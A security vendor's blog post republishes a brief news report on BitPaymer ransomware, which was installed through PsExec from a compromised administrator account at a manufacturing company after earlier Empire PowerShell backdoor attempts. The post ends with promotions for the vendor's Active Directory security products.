Attivo Networks Blogs

Threat actors gaining admin rights before ransomware infections

SC media logo

Threat actors are using accounts with admin privileges to install BitPaymer ransomware via PsExec suggesting threat actors are taking a more targeted approach to their distribution of malware.

Similar to the Arizona Beverageransomware attack earlier this month, a manufacturing company also appears to have been targeted in an attack in which the company’s name was explicitly mentioned in the ransom note.

This lead Trend Micro Researchers to believe an account with administrative privileges may have been compromised to install BitPaymer via PsExec.

“BitPaymer, which is related to the iEncrypt ransomware, was executed in the manufacturing company’s system using PsExec,” researchers said in an April 15 blog post. “Our analysis revealed that on February 18, 2019 PST, between 9:40 p.m. and 11:03 p.m., commands were sent via PsExec to copy and execute the BitPaymer variant.”

Between January 29 to February 18 threat actors attempted multiple attempts to run an Empire PowerShell backdoor on several of the machines that were detected by researchers.

It’s possible that one of these attacks resulted in a security breach that took place before the ransomware was installed since researchers said that the attacker needed at least one account with administrative privileges in order to run the commands.

Researchers said these infections could have been prevented if the victims has used a managed detection and response security services that would allow experts to spot threats before they damage organizations’ IT systems.


Share on:

Free Active Directory Assessment

Get Visibility Into Privilege And Service Account Exposure

For a limited time, Attivo Networks is providing free Active Directory Security Assessments to demonstrate how ADAssessor provides unprecedented and continuous visibility to AD vulnerabilities.

Try Our Endpoint Detection Net (EDN) for Free


Free use offer of our Award-winning security solution to prevent attackers from lateral movement, credential theft, and privilege escalation, fast and easy.

ADSecure 90-Day Free Trial


  • Hide and deny access to AD objects
  • Get alerted on unauthorized queries
  • Attack details easily viewable in dashboard
  • Your data remains on-premise


Leave a Comment

Your email address will not be published.

four × 1 =

Ready to find out what’s lurking in your network?

Scroll to Top